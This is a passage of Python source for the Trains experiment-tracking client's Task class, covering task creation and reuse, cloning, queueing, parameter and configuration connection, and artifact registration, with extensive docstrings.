from .binding.matplotlib_bind import PatchedMatplotlib
from .config import config, DEV_TASK_NO_REUSE, get_is_master_node
from .config import running_remotely, get_remote_task_id
from .config.cache import SessionCache
from .debugging.log import LoggerRoot
from .errors import UsageError
from .logger import Logger
from .model import Model, InputModel, OutputModel, ARCHIVED_TAG
from .task_parameters import TaskParameters
from .utilities.args import argparser_parseargs_called, get_argparser_last_args, \
argparser_update_currenttask
from .utilities.dicts import ReadOnlyDict
from .utilities.proxy_object import ProxyDictPreWrite, ProxyDictPostWrite, flatten_dictionary, \
nested_from_flat_dictionary, naive_nested_from_flat_dictionary
from .utilities.resource_monitor import ResourceMonitor
from .utilities.seed import make_deterministic
# noinspection PyProtectedMember
from .backend_interface.task.args import _Arguments
if TYPE_CHECKING:
import pandas
import numpy
from PIL import Image
class Task(_Task):
"""
The ``Task`` class is a code template for a Task object which, together with its connected experiment components,
represents the current running experiment. These connected components include hyperparameters, loggers,
configuration, label enumeration, models, and other artifacts.
The term "main execution Task" refers to the Task context for current running experiment. Python experiment scripts
can create one, and only one, main execution Task. It is a traceable, and after a script runs and Trains stores
the Task in the **Trains Server** (backend), it is modifiable, reproducible, executable by a worker, and you
can duplicate it for further experimentation.
The ``Task`` class and its methods allow you to create and manage experiments, as well as perform
advanced experimentation functions, such as autoML.
.. warning::
Do not construct Task objects directly. Use one of the methods listed below to create experiments or
reference existing experiments.
For detailed information about creating Task objects, see the following methods:
- :meth:`Task.init` - Create a new reproducible Task, or reuse one.
- :meth:`Task.create` - Create a new non-reproducible Task.
- :meth:`Task.current_task` - Get the current running Task.
- :meth:`Task.get_task` - Get another Task (whose metadata the **Trains Server** maintains).
.. note::
The **Trains** documentation often refers to a Task as, "Task (experiment)".
"Task" refers to the class in the Trains Python Client Package, the object in your Python experiment script,
and the entity with which **Trains Server** and **Trains Agent** work.
"Experiment" refers to your deep learning solution, including its connected components, inputs, and outputs,
and is the experiment you can view, analyze, compare, modify, duplicate, and manage using the Trains
**Web-App** (UI).
Therefore, a "Task" is effectively an "experiment", and "Task (experiment)" encompasses its usage throughout
the Trains.
The exception to this Task behavior is sub-tasks (non-reproducible Tasks), which do not use the main execution
Task. Creating a sub-task always creates a new Task with a new Task ID.
"""
TaskTypes = _Task.TaskTypes
NotSet = object()
__create_protection = object()
__main_task = None # type: Optional[Task]
__exit_hook = None
__forked_proc_main_pid = None
__task_id_reuse_time_window_in_hours = float(config.get('development.task_reuse_time_window_in_hours', 24.0))
__detect_repo_async = config.get('development.vcs_repo_detect_async', False)
__default_output_uri = config.get('development.default_output_uri', None)
class _ConnectedParametersType(object):
argparse = "argument_parser"
dictionary = "dictionary"
task_parameters = "task_parameters"
@classmethod
def _options(cls):
return {
var for var, val in vars(cls).items()
if isinstance(val, six.string_types)
}
def __init__(self, private=None, **kwargs):
"""
.. warning::
**Do not construct Task manually!**
Please use :meth:`Task.init` or :meth:`Task.get_task`
"""
if private is not Task.__create_protection:
raise UsageError(
'Task object cannot be instantiated externally, use Task.current_task() or Task.get_task(...)')
self._repo_detect_lock = threading.RLock()
super(Task, self).__init__(**kwargs)
self._arguments = _Arguments(self)
self._logger = None
self._last_input_model_id = None
self._connected_output_model = None
self._dev_worker = None
self._connected_parameter_type = None
self._detect_repo_async_thread = None
self._resource_monitor = None
self._artifacts_manager = Artifacts(self)
self._calling_filename = None
# register atexit, so that we mark the task as stopped
self._at_exit_called = False
@classmethod
def current_task(cls):
# type: () -> Task
"""
Get the current running Task (experiment). This is the main execution Task (task context) returned as a Task
object.
:return: The current running Task (experiment).
"""
return cls.__main_task
@classmethod
def init(
cls,
project_name=None, # type: Optional[str]
task_name=None, # type: Optional[str]
task_type=TaskTypes.training, # type: Task.TaskTypes
reuse_last_task_id=True, # type: bool
output_uri=None, # type: Optional[str]
auto_connect_arg_parser=True, # type: Union[bool, Mapping[str, bool]]
auto_connect_frameworks=True, # type: Union[bool, Mapping[str, bool]]
auto_resource_monitoring=True, # type: bool
):
# type: (...) -> Task
"""
Creates a new Task (experiment), or returns the existing Task, depending upon the following:
- If **any** of the following are true, Trains creates a new Task and a new Task ID:
- a Task in the same project with same name does not exist, **or**
- a Task in the same project with same name does exist and its status is ``Published``, **or**
- the ``reuse_last_task_id`` parameter is assigned ``False``.
- If **all** of the following are true, Trains returns the existing Task with the existing Task ID:
- a Task in the same project with the same name does exist, **and**
- the Task's status is ``Draft``, ``Completed``, ``Failed``, or ``Aborted``, **and**
- the ``reuse_last_task_id`` parameter is the default value of ``True``.
.. warning::
When a Python experiment script runs using an existing Task, it overwrites previous experiment output.
:param str project_name: The name of the project in which the experiment will be created. If the project does
not exist, it is created. If ``project_name`` is ``None``, the repository name is used. (Optional)
:param str task_name: The name of Task (experiment). If ``task_name`` is ``None``, the Python experiment
script's file name is used. (Optional)
:param TaskTypes task_type: The task type.
Valid task types:
- ``TaskTypes.training`` (default)
- ``TaskTypes.testing``
- ``TaskTypes.inference``
- ``TaskTypes.data_processing``
- ``TaskTypes.application``
- ``TaskTypes.monitor``
- ``TaskTypes.controller``
- ``TaskTypes.optimizer``
- ``TaskTypes.service``
- ``TaskTypes.qc``
- ``TaskTypes.custom``
:param bool reuse_last_task_id: Force a new Task (experiment) with a new Task ID, but
the same project and Task names.
.. note::
Trains creates the new Task ID using the previous Id, which is stored in the data cache folder.
The values are:
- ``True`` - Reuse the last Task ID. (default)
- ``False`` - Force a new Task (experiment).
- A string - In addition to a boolean, you can use a string to set a specific value for Task ID
(instead of the system generated UUID).
:param str output_uri: The default location for output models and other artifacts. In the default location,
Trains creates a subfolder for the output. The subfolder structure is the following:
<output destination name> / <project name> / <task name>.< Task ID>
The following are examples of ``output_uri`` values for the supported locations:
- A shared folder: ``/mnt/share/folder``
- S3: ``s3://bucket/folder``
- Google Cloud Storage: ``gs://bucket-name/folder``
- Azure Storage: ``azure://company.blob.core.windows.net/folder/``
.. important::
For cloud storage, you must install the **Trains** package for your cloud storage type,
and then configure your storage credentials. For detailed information, see
`Trains Python Client Extras <./references/trains_extras_storage/>`_ in the "Trains Python Client
Reference" section.
:param auto_connect_arg_parser: Automatically connect an argparse object to the Task?
The values are:
- ``True`` - Automatically connect. (default)
- ``False`` - Do not automatically connect.
- A dictionary - In addition to a boolean, you can use a dictionary for fined grained control of connected
arguments. The dictionary keys are argparse variable names and the values are booleans.
The ``False`` value excludes the specified argument from the Task's parameter section.
Keys missing from the dictionary default to ``True``, and an empty dictionary defaults to ``False``.
For example:
.. code-block:: py
auto_connect_arg_parser={'do_not_include_me': False, }
.. note::
To manually connect an argparse, use :meth:`Task.connect`.
:param auto_connect_frameworks: Automatically connect frameworks? This includes patching MatplotLib, XGBoost,
scikit-learn, Keras callbacks, and TensorBoard/X to serialize plots, graphs, and the model location to
the **Trains Server** (backend), in addition to original output destination.
The values are:
- ``True`` - Automatically connect (default)
- ``False`` - Do not automatically connect
- A dictionary - In addition to a boolean, you can use a dictionary for fined grained control of connected
frameworks. The dictionary keys are frameworks and the values are booleans.
Keys missing from the dictionary default to ``True``, and an empty dictionary defaults to ``False``.
For example:
.. code-block:: py
auto_connect_frameworks={'matplotlib': True, 'tensorflow': True, 'pytorch': True,
'xgboost': True, 'scikit': True}
:param bool auto_resource_monitoring: Automatically create machine resource monitoring plots?
These plots appear in in the **Trains Web-App (UI)**, **RESULTS** tab, **SCALARS** sub-tab,
with a title of **:resource monitor:**.
The values are:
- ``True`` - Automatically create resource monitoring plots. (default)
- ``False`` - Do not automatically create.
:return: The main execution Task (Task context).
"""
def verify_defaults_match():
validate = [
('project name', project_name, cls.__main_task.get_project_name()),
('task name', task_name, cls.__main_task.name),
('task type', str(task_type), str(cls.__main_task.task_type)),
]
for field, default, current in validate:
if default is not None and default != current:
raise UsageError(
"Current task already created "
"and requested {field} '{default}' does not match current {field} '{current}'. "
"If you wish to create additional tasks use `Task.create`".format(
field=field,
default=default,
current=current,
)
)
if cls.__main_task is not None:
# if this is a subprocess, regardless of what the init was called for,
# we have to fix the main task hooks and stdout bindings
if cls.__forked_proc_main_pid != os.getpid() and cls.__is_subprocess():
if task_type is None:
task_type = cls.__main_task.task_type
# make sure we only do it once per process
cls.__forked_proc_main_pid = os.getpid()
# make sure we do not wait for the repo detect thread
cls.__main_task._detect_repo_async_thread = None
cls.__main_task._dev_worker = None
cls.__main_task._resource_monitor = None
# remove the logger from the previous process
logger = cls.__main_task.get_logger()
logger.set_flush_period(None)
# create a new logger (to catch stdout/err)
cls.__main_task._logger = None
cls.__main_task._reporter = None
cls.__main_task.get_logger()
cls.__main_task._artifacts_manager = Artifacts(cls.__main_task)
# unregister signal hooks, they cause subprocess to hang
# noinspection PyProtectedMember
cls.__main_task.__register_at_exit(cls.__main_task._at_exit)
# TODO: Check if the signal handler method is safe enough, for the time being, do not unhook
# cls.__main_task.__register_at_exit(None, only_remove_signal_and_exception_hooks=True)
if not running_remotely():
verify_defaults_match()
return cls.__main_task
is_sub_process_task_id = None
# check that we are not a child process, in that case do nothing.
# we should not get here unless this is Windows platform, all others support fork
if cls.__is_subprocess():
class _TaskStub(object):
def __call__(self, *args, **kwargs):
return self
def __getattr__(self, attr):
return self
def __setattr__(self, attr, val):
pass
is_sub_process_task_id = cls.__get_master_id_task_id()
# we could not find a task ID, revert to old stub behaviour
if not is_sub_process_task_id:
return _TaskStub()
elif running_remotely() and not get_is_master_node():
# make sure we only do it once per process
cls.__forked_proc_main_pid = os.getpid()
# make sure everyone understands we should act as if we are a subprocess (fake pid 1)
cls.__update_master_pid_task(pid=1, task=get_remote_task_id())
else:
# set us as master process (without task ID)
cls.__update_master_pid_task()
is_sub_process_task_id = None
if task_type is None:
# Backwards compatibility: if called from Task.current_task and task_type
# was not specified, keep legacy default value of TaskTypes.training
task_type = cls.TaskTypes.training
elif isinstance(task_type, six.string_types):
if task_type not in Task.TaskTypes.__members__:
raise ValueError("Task type '{}' not supported, options are: {}".format(
task_type, Task.TaskTypes.__members__.keys()))
task_type = Task.TaskTypes.__members__[str(task_type)]
try:
if not running_remotely():
# if this is the main process, create the task
if not is_sub_process_task_id:
task = cls._create_dev_task(
project_name,
task_name,
task_type,
reuse_last_task_id,
detect_repo=False if (isinstance(auto_connect_frameworks, dict) and
not auto_connect_frameworks.get('detect_repository', True)) else True
)
# set defaults
if output_uri:
task.output_uri = output_uri
elif cls.__default_output_uri:
task.output_uri = cls.__default_output_uri
# store new task ID
cls.__update_master_pid_task(task=task)
else:
# subprocess should get back the task info
task = Task.get_task(task_id=is_sub_process_task_id)
else:
# if this is the main process, create the task
if not is_sub_process_task_id:
task = cls(
private=cls.__create_protection,
task_id=get_remote_task_id(),
log_to_backend=False,
)
if cls.__default_output_uri and not task.output_uri:
task.output_uri = cls.__default_output_uri
# store new task ID
cls.__update_master_pid_task(task=task)
# make sure we are started
task.started(ignore_errors=True)
else:
# subprocess should get back the task info
task = Task.get_task(task_id=is_sub_process_task_id)
except Exception:
raise
else:
Task.__main_task = task
# register the main task for at exit hooks (there should only be one)
task.__register_at_exit(task._at_exit)
# patch OS forking
PatchOsFork.patch_fork()
if auto_connect_frameworks:
is_auto_connect_frameworks_bool = not isinstance(auto_connect_frameworks, dict)
if is_auto_connect_frameworks_bool or auto_connect_frameworks.get('scikit', True):
PatchedJoblib.update_current_task(task)
if is_auto_connect_frameworks_bool or auto_connect_frameworks.get('matplotlib', True):
PatchedMatplotlib.update_current_task(Task.__main_task)
if is_auto_connect_frameworks_bool or auto_connect_frameworks.get('tensorflow', True):
PatchAbsl.update_current_task(Task.__main_task)
TensorflowBinding.update_current_task(task)
if is_auto_connect_frameworks_bool or auto_connect_frameworks.get('pytorch', True):
PatchPyTorchModelIO.update_current_task(task)
if is_auto_connect_frameworks_bool or auto_connect_frameworks.get('xgboost', True):
PatchXGBoostModelIO.update_current_task(task)
if auto_resource_monitoring and not is_sub_process_task_id:
task._resource_monitor = ResourceMonitor(
task, report_mem_used_per_process=not config.get(
'development.worker.report_global_mem_used', False))
task._resource_monitor.start()
# make sure all random generators are initialized with new seed
make_deterministic(task.get_random_seed())
if auto_connect_arg_parser:
EnvironmentBind.update_current_task(Task.__main_task)
# Patch ArgParser to be aware of the current task
argparser_update_currenttask(Task.__main_task)
# set excluded arguments
if isinstance(auto_connect_arg_parser, dict):
task._arguments.exclude_parser_args(auto_connect_arg_parser)
# Check if parse args already called. If so, sync task parameters with parser
if argparser_parseargs_called():
parser, parsed_args = get_argparser_last_args()
task._connect_argparse(parser=parser, parsed_args=parsed_args)
elif argparser_parseargs_called():
# actually we have nothing to do, in remote running, the argparser will ignore
# all non argparser parameters, only caveat if parameter connected with the same name
# as the argparser this will be solved once sections are introduced to parameters
pass
# Make sure we start the logger, it will patch the main logging object and pipe all output
# if we are running locally and using development mode worker, we will pipe all stdout to logger.
# The logger will automatically take care of all patching (we just need to make sure to initialize it)
logger = task.get_logger()
# show the debug metrics page in the log, it is very convenient
if not is_sub_process_task_id:
logger.report_text(
'TRAINS results page: {}'.format(task.get_output_log_web_page()),
)
# Make sure we start the dev worker if required, otherwise it will only be started when we write
# something to the log.
task._dev_mode_task_start()
return task
@classmethod
def create(cls, project_name=None, task_name=None, task_type=TaskTypes.training):
# type: (Optional[str], Optional[str], TaskTypes) -> Task
"""
Create a new, non-reproducible Task (experiment). This is called a sub-task.
.. note::
- This method always creates a new Task.
- To create reproducible Tasks, use the :meth:`Task.init` method.
:param str project_name: The name of the project in which the experiment will be created.
If ``project_name`` is ``None``, and the main execution Task is initialized (see :meth:`Task.init`),
then the main execution Task's project is used. Otherwise, if the project does
not exist, it is created. (Optional)
:param str task_name: The name of Task (experiment).
:param TaskTypes task_type: The task type.
Valid task types:
- ``TaskTypes.training`` (default)
- ``TaskTypes.testing``
- ``TaskTypes.inference``
- ``TaskTypes.data_processing``
- ``TaskTypes.application``
- ``TaskTypes.monitor``
- ``TaskTypes.controller``
- ``TaskTypes.optimizer``
- ``TaskTypes.service``
- ``TaskTypes.qc``
- ``TaskTypes.custom``
:return: A new experiment.
"""
if not project_name:
if not cls.__main_task:
raise ValueError("Please provide project_name, no global task context found "
"(Task.current_task hasn't been called)")
project_name = cls.__main_task.get_project_name()
try:
task = cls(
private=cls.__create_protection,
project_name=project_name,
task_name=task_name,
task_type=task_type,
log_to_backend=False,
force_create=True,
)
except Exception:
raise
return task
@classmethod
def get_task(cls, task_id=None, project_name=None, task_name=None):
# type: (Optional[str], Optional[str], Optional[str]) -> Task
"""
Get a Task by Id, or project name / task name combination.
:param str task_id: The Id (system UUID) of the experiment to get.
If specified, ``project_name`` and ``task_name`` are ignored.
:param str project_name: The project name of the Task to get.
:param str task_name: The name of the Task within ``project_name`` to get.
:return: The Task specified by ID, or project name / experiment name combination.
"""
return cls.__get_task(task_id=task_id, project_name=project_name, task_name=task_name)
@classmethod
def get_tasks(cls, task_ids=None, project_name=None, task_name=None, task_filter=None):
# type: (Optional[Sequence[str]], Optional[str], Optional[str], Optional[Dict]) -> Sequence[Task]
"""
Get a list of Tasks by one of the following:
- A list of specific Task IDs.
- All Tasks in a project matching a full or partial Task name.
- All Tasks in any project matching a full or partial Task name.
:param list(str) task_ids: The Ids (system UUID) of experiments to get.
If ``task_ids`` specified, then ``project_name`` and ``task_name`` are ignored.
:param str project_name: The project name of the Tasks to get. To get the experiment
in all projects, use the default value of ``None``. (Optional)
:param str task_name: The full name or partial name of the Tasks to match within the specified
``project_name`` (or all projects if ``project_name`` is ``None``).
This method supports regular expressions for name matching. (Optional)
:param list(str) task_ids: list of unique task id string (if exists other parameters are ignored)
:param str project_name: project name (str) the task belongs to (use None for all projects)
:param str task_name: task name (str) in within the selected project
Return any partial match of task_name, regular expressions matching is also supported
If None is passed, returns all tasks within the project
:param dict task_filter: filter and order Tasks. See service.tasks.GetAllRequest for details
:return: The Tasks specified by the parameter combinations (see the parameters).
"""
return cls.__get_tasks(task_ids=task_ids, project_name=project_name,
task_name=task_name, **(task_filter or {}))
@property
def output_uri(self):
# type: () -> str
return self.storage_uri
@output_uri.setter
def output_uri(self, value):
# type: (str) -> None
# check if we have the correct packages / configuration
if value and value != self.storage_uri:
from .storage.helper import StorageHelper
helper = StorageHelper.get(value)
if not helper:
raise ValueError("Could not get access credentials for '{}' "
", check configuration file ~/trains.conf".format(value))
helper.check_write_permissions(value)
self.storage_uri = value
@property
def artifacts(self):
# type: () -> Dict[str, Artifact]
"""
A read-only dictionary of Task artifacts (name, artifact).
:return: The artifacts.
"""
if not Session.check_min_api_version('2.3'):
return ReadOnlyDict()
artifacts_pairs = []
if self.data.execution and self.data.execution.artifacts:
artifacts_pairs = [(a.key, Artifact(a)) for a in self.data.execution.artifacts]
if self._artifacts_manager:
artifacts_pairs += list(self._artifacts_manager.registered_artifacts.items())
return ReadOnlyDict(artifacts_pairs)
@property
def models(self):
# type: () -> Dict[str, Sequence[Model]]
"""
Read-only dictionary of the Task's loaded/stored models
:return: A dictionary of models loaded/stored {'input': list(Model), 'output': list(Model)}.
"""
return self.get_models()
@classmethod
def clone(
cls,
source_task=None, # type: Optional[Union[Task, str]]
name=None, # type: Optional[str]
comment=None, # type: Optional[str]
parent=None, # type: Optional[str]
project=None, # type: Optional[str]
):
# type: (...) -> Task
"""
Create a duplicate (a clone) of a Task (experiment). The status of the cloned Task is ``Draft``
and modifiable.
Use this method to manage experiments and for autoML.
:param str source_task: The Task to clone. Specify a Task object or a Task ID. (Optional)
:param str name: The name of the new cloned Task. (Optional)
:param str comment: A comment / description for the new cloned Task. (Optional)
:param str parent: The Id of the parent Task of the new Task.
- If ``parent`` is not specified, then ``parent`` is set to ``source_task.parent``.
- If ``parent`` is not specified and ``source_task.parent`` is not available, then
``parent`` set to to ``source_task``.
:param str project: The Id of the project in which to create the new Task.
If ``None``, the new task inherits the original Task's project. (Optional)
:return: The new cloned Task (experiment).
"""
assert isinstance(source_task, (six.string_types, Task))
if not Session.check_min_api_version('2.4'):
raise ValueError("Trains-server does not support DevOps features, "
"upgrade trains-server to 0.12.0 or above")
task_id = source_task if isinstance(source_task, six.string_types) else source_task.id
if not parent:
if isinstance(source_task, six.string_types):
source_task = cls.get_task(task_id=source_task)
parent = source_task.id if not source_task.parent else source_task.parent
elif isinstance(parent, Task):
parent = parent.id
cloned_task_id = cls._clone_task(cloned_task_id=task_id, name=name, comment=comment,
parent=parent, project=project)
cloned_task = cls.get_task(task_id=cloned_task_id)
return cloned_task
@classmethod
def enqueue(cls, task, queue_name=None, queue_id=None):
# type: (Union[Task, str], Optional[str], Optional[str]) -> Any
"""
Enqueue a Task for execution, by adding it to an execution queue.
.. note::
A worker daemon must be listening at the queue for the worker to fetch the Task and execute it,
see `Use Case Examples <../trains_agent_ref/#use-case-examples>`_ on the "Trains Agent
Reference page.
:param Task/str task: The Task to enqueue. Specify a Task object or Task ID.
:param str queue_name: The name of the queue. If not specified, then ``queue_id`` must be specified.
:param str queue_id: The Id of the queue. If not specified, then ``queue_name`` must be specified.
:return: An enqueue JSON response.
.. code-block:: javascript
{
"queued": 1,
"updated": 1,
"fields": {
"status": "queued",
"status_reason": "",
"status_message": "",
"status_changed": "2020-02-24T15:05:35.426770+00:00",
"last_update": "2020-02-24T15:05:35.426770+00:00",
"execution.queue": "2bd96ab2d9e54b578cc2fb195e52c7cf"
}
}
- ``queued`` - The number of Tasks enqueued (an integer or ``null``).
- ``updated`` - The number of Tasks updated (an integer or ``null``).
- ``fields``
- ``status`` - The status of the experiment.
- ``status_reason`` - The reason for the last status change.
- ``status_message`` - Information about the status.
- ``status_changed`` - The last status change date and time (ISO 8601 format).
- ``last_update`` - The last Task update time, including Task creation, update, change, or events for
this task (ISO 8601 format).
- ``execution.queue`` - The Id of the queue where the Task is enqueued. ``null`` indicates not enqueued.
"""
assert isinstance(task, (six.string_types, Task))
if not Session.check_min_api_version('2.4'):
raise ValueError("Trains-server does not support DevOps features, "
"upgrade trains-server to 0.12.0 or above")
# make sure we have wither name ot id
mutually_exclusive(queue_name=queue_name, queue_id=queue_id)
task_id = task if isinstance(task, six.string_types) else task.id
session = cls._get_default_session()
if not queue_id:
req = queues.GetAllRequest(name=exact_match_regex(queue_name), only_fields=["id"])
res = cls._send(session=session, req=req)
if not res.response.queues:
raise ValueError('Could not find queue named "{}"'.format(queue_name))
queue_id = res.response.queues[0].id
if len(res.response.queues) > 1:
LoggerRoot.get_base_logger().info("Multiple queues with name={}, selecting queue id={}".format(
queue_name, queue_id))
req = tasks.EnqueueRequest(task=task_id, queue=queue_id)
res = cls._send(session=session, req=req)
resp = res.response
return resp
@classmethod
def dequeue(cls, task):
# type: (Union[Task, str]) -> Any
"""
Dequeue (remove) a Task from an execution queue.
:param Task/str task: The Task to dequeue. Specify a Task object or Task ID.
:return: A dequeue JSON response.
.. code-block:: javascript
{
"dequeued": 1,
"updated": 1,
"fields": {
"status": "created",
"status_reason": "",
"status_message": "",
"status_changed": "2020-02-24T16:43:43.057320+00:00",
"last_update": "2020-02-24T16:43:43.057320+00:00",
"execution.queue": null
}
}
- ``dequeued`` - The number of Tasks enqueued (an integer or ``null``).
- ``fields``
- ``status`` - The status of the experiment.
- ``status_reason`` - The reason for the last status change.
- ``status_message`` - Information about the status.
- ``status_changed`` - The last status change date and time in ISO 8601 format.
- ``last_update`` - The last time the Task was created, updated,
changed or events for this task were reported.
- ``execution.queue`` - The Id of the queue where the Task is enqueued. ``null`` indicates not enqueued.
- ``updated`` - The number of Tasks updated (an integer or ``null``).
"""
assert isinstance(task, (six.string_types, Task))
if not Session.check_min_api_version('2.4'):
raise ValueError("Trains-server does not support DevOps features, "
"upgrade trains-server to 0.12.0 or above")
task_id = task if isinstance(task, six.string_types) else task.id
session = cls._get_default_session()
req = tasks.DequeueRequest(task=task_id)
res = cls._send(session=session, req=req)
resp = res.response
return resp
def add_tags(self, tags):
# type: (Union[Sequence[str], str]) -> None
"""
Add Tags to this task. Old tags are not deleted. When executing a Task (experiment) remotely,
this method has no effect).
:param tags: A list of tags which describe the Task to add.
"""
if not running_remotely() or not self.is_main_task():
if isinstance(tags, six.string_types):
tags = tags.split(" ")
self.data.tags.extend(tags)
self._edit(tags=list(set(self.data.tags)))
def connect(self, mutable):
# type: (Any) -> Any
"""
Connect an object to a Task object. This connects an experiment component (part of an experiment) to the
experiment. For example, connect hyperparameters or models.
:param object mutable: The experiment component to connect. The object can be any object Task supports
integrating, including:
- argparse - An argparse object for parameters.
- dict - A dictionary for parameters.
- TaskParameters - A TaskParameters object.
- model - A model object for initial model warmup, or for model update/snapshot uploading.
:return: The result returned when connecting the object, if supported.
:raise: Raise an exception on unsupported objects.
"""
dispatch = (
(OutputModel, self._connect_output_model),
(InputModel, self._connect_input_model),
(ArgumentParser, self._connect_argparse),
(dict, self._connect_dictionary),
(TaskParameters, self._connect_task_parameters),
)
for mutable_type, method in dispatch:
if isinstance(mutable, mutable_type):
return method(mutable)
raise Exception('Unsupported mutable type %s: no connect function found' % type(mutable).__name__)
def connect_configuration(self, configuration):
# type: (Union[Mapping, Path, str]) -> Union[Mapping, Path, str]
"""
Connect a configuration dictionary or configuration file (pathlib.Path / str) to a Task object.
This method should be called before reading the configuration file.
Later, when creating an output model, the model will include the contents of the configuration dictionary
or file.
For example, a local file:
.. code-block:: py
config_file = task.connect_configuration(config_file)
my_params = json.load(open(config_file,'rt'))
A parameter dictionary:
.. code-block:: py
my_params = task.connect_configuration(my_params)
:param configuration: The configuration. This is usually the configuration used in the model training process.
Specify one of the following:
- A dictionary - A dictionary containing the configuration. Trains stores the configuration in
the **Trains Server** (backend), in a HOCON format (JSON-like format) which is editable.
- A ``pathlib2.Path`` string - A path to the configuration file. Trains stores the content of the file.
A local path must be relative path. When executing a Task remotely in a worker, the contents brought
from the **Trains Server** (backend) overwrites the contents of the file.
:return: If a dictionary is specified, then a dictionary is returned. If pathlib2.Path / string is
specified, then a path to a local configuration file is returned. Configuration object.
"""
if not isinstance(configuration, (dict, Path, six.string_types)):
raise ValueError("connect_configuration supports `dict`, `str` and 'Path' types, "
"{} is not supported".format(type(configuration)))
# parameter dictionary
if isinstance(configuration, dict):
def _update_config_dict(task, config_dict):
# noinspection PyProtectedMember
task._set_model_config(config_dict=config_dict)
if not running_remotely() or not self.is_main_task():
self._set_model_config(config_dict=configuration)
configuration = ProxyDictPostWrite(self, _update_config_dict, **configuration)
else:
configuration.clear()
configuration.update(self._get_model_config_dict())
configuration = ProxyDictPreWrite(False, False, **configuration)
return configuration
# it is a path to a local file
if not running_remotely() or not self.is_main_task():
# check if not absolute path
configuration_path = Path(configuration)
if not configuration_path.is_file():
ValueError("Configuration file does not exist")
try:
with open(configuration_path.as_posix(), 'rt') as f:
configuration_text = f.read()
except Exception:
raise ValueError("Could not connect configuration file {}, file could not be read".format(
configuration_path.as_posix()))
self._set_model_config(config_text=configuration_text)
return configuration
else:
configuration_text = self._get_model_config_text()
configuration_path = Path(configuration)
fd, local_filename = mkstemp(prefix='trains_task_config_',
suffix=configuration_path.suffixes[-1] if
configuration_path.suffixes else '.txt')
os.write(fd, configuration_text.encode('utf-8'))
os.close(fd)
return Path(local_filename) if isinstance(configuration, Path) else local_filename
def connect_label_enumeration(self, enumeration):
# type: (Dict[str, int]) -> Dict[str, int]
"""
Connect a label enumeration dictionary to a Task (experiment) object.
Later, when creating an output model, the model will include the label enumeration dictionary.
:param dict enumeration: A label enumeration dictionary of string (label) to integer (value) pairs.
For example:
.. code-block:: javascript
{
'background': 0,
'person': 1
}
:return: The label enumeration dictionary (JSON).
"""
if not isinstance(enumeration, dict):
raise ValueError("connect_label_enumeration supports only `dict` type, "
"{} is not supported".format(type(enumeration)))
if not running_remotely() or not self.is_main_task():
self.set_model_label_enumeration(enumeration)
else:
# pop everything
enumeration.clear()
enumeration.update(self.get_labels_enumeration())
return enumeration
def get_logger(self):
# type: () -> Logger
"""
Get a Logger object for reporting, for this task context. You can view all Logger report output associated with
the Task for which this method is called, including metrics, plots, text, tables, and images, in the
**Trains Web-App (UI)**.
:return: The Logger for the Task (experiment).
"""
return self._get_logger()
def mark_started(self):
"""
Manually mark a Task as started (happens automatically)
"""
# UI won't let us see metrics if we're not started
self.started()
self.reload()
def mark_stopped(self):
"""
Manually mark a Task as stopped (also used in :meth:`_at_exit`)
"""
# flush any outstanding logs
self.flush(wait_for_uploads=True)
# mark task as stopped
self.stopped()
def flush(self, wait_for_uploads=False):
# type: (bool) -> bool
"""
Flush any outstanding reports or console logs.
:param bool wait_for_uploads: Wait for all outstanding uploads to complete before existing the flush?
- ``True`` - Wait
- ``False`` - Do not wait (default)
"""
# make sure model upload is done
if BackendModel.get_num_results() > 0 and wait_for_uploads:
BackendModel.wait_for_results()
# flush any outstanding logs
if self._logger:
# noinspection PyProtectedMember
self._logger._flush_stdout_handler()
if self._reporter:
self.reporter.flush()
LoggerRoot.flush()
return True
def reset(self, set_started_on_success=False, force=False):
# type: (bool, bool) -> None
"""
Reset a Task. Trains reloads a Task after a successful reset.
When a worker executes a Task remotely, the Task does not reset unless
the ``force`` parameter is set to ``True`` (this avoids accidentally clearing logs and metrics).
:param bool set_started_on_success: If successful, automatically set the Task to started?
- ``True`` - If successful, set to started.
- ``False`` - If successful, do not set to started. (default)
:param bool force: Force a Task reset, even when executing the Task (experiment) remotely in a worker?
- ``True`` - Force
- ``False`` - Do not force (default)
"""
if not running_remotely() or not self.is_main_task() or force:
super(Task, self).reset(set_started_on_success=set_started_on_success)
def close(self):
"""
Close the current Task. Enables you to manually shutdown the task.
.. warning::
Only call :meth:`Task.close` if you are certain the Task is not needed.
"""
if self._at_exit_called:
return
# store is main before we call at_exit, because will will Null it
is_main = self.is_main_task()
# wait for repository detection (5 minutes should be reasonable time to detect all packages)
if self._logger and not self.__is_subprocess():
self._wait_for_repo_detection(timeout=300.)
self.__shutdown()
# unregister atexit callbacks and signal hooks, if we are the main task
if is_main:
self.__register_at_exit(None)
def register_artifact(self, name, artifact, metadata=None, uniqueness_columns=True):
# type: (str, pandas.DataFrame, Dict, Union[bool, Sequence[str]]) -> None
"""
Register (add) an artifact for the current Task. Registered artifacts are dynamically sychronized with the
**Trains Server** (backend). If a registered artifact is updated, the update is stored in the
**Trains Server** (backend). Registered artifacts are primarily used for Data Audition.
The currently supported registered artifact object type is a pandas.DataFrame.
See also :meth:`Task.unregister_artifact` and :meth:`Task.get_registered_artifacts`.
.. note::
Trains also supports uploaded artifacts which are one-time uploads of static artifacts that are not
dynamically sychronized with the **Trains Server** (backend). These static artifacts include
additional object types. For more information, see :meth:`Task.upload_artifact`.
:param str name: The name of the artifact.
.. warning::
If an artifact with the same name was previously registered, it is overwritten.
:param object artifact: The artifact object.
:param dict metadata: A dictionary of key-value pairs for any metadata. This dictionary appears with the
experiment in the **Trains Web-App (UI)**, **ARTIFACTS** tab.
:param uniqueness_columns: A Sequence of columns for artifact uniqueness comparison criteria, or the default
value of ``True``. If ``True``, the artifact uniqueness comparison criteria is all the columns,
which is the same as ``artifact.columns``.
"""
if not isinstance(uniqueness_columns, CollectionsSequence) and uniqueness_columns is not True:
raise ValueError('uniqueness_columns should be a List (sequence) or True')
if isinstance(uniqueness_columns, str):
uniqueness_columns = [uniqueness_columns]
self._artifacts_manager.register_artifact(
name=name, artifact=artifact, metadata=metadata, uniqueness_columns=uniqueness_columns)
def unregister_artifact(self, name):
# type: (str) -> None
"""
Unregister (remove) a registered artifact. This removes the artifact from the watch list that Trains uses
to synchronize artifacts with the **Trains Server** (backend).
.. important::
- Calling this method does not remove the artifact from a Task. It only stops Trains from
monitoring the artifact.
- When this method is called, Trains immediately takes the last snapshot of the artifact.
"""
self._artifacts_manager.unregister_artifact(name=name)
def get_registered_artifacts(self):
# type: () -> Dict[str, Artifact]
"""
